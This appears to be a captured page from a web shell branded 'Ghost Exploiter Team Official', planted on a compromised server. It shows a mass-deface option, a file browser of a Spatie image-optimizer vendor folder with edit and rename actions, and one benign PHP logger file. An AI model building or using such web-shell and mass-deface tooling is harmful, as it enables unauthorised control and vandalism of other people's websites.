Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
image-optimizer
/
src
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Optimizers
--
ren
DummyLogger.php
0.799KB
edt
ren
Image.php
1.699KB
edt
ren
Optimizer.php
1.05KB
edt
ren
OptimizerChain.php
2.832KB
edt
ren
OptimizerChainFactory.php
2.462KB
edt
ren
<?php namespace Spatie\ImageOptimizer; use Psr\Log\LoggerInterface; class DummyLogger implements LoggerInterface { public function emergency($message, array $context = []): void { } public function alert($message, array $context = []): void { } public function critical($message, array $context = []): void { } public function error($message, array $context = []): void { } public function warning($message, array $context = []): void { } public function notice($message, array $context = []): void { } public function info($message, array $context = []): void { } public function debug($message, array $context = []): void { } public function log($level, $message, array $context = []): void { } }
<=Back
Liking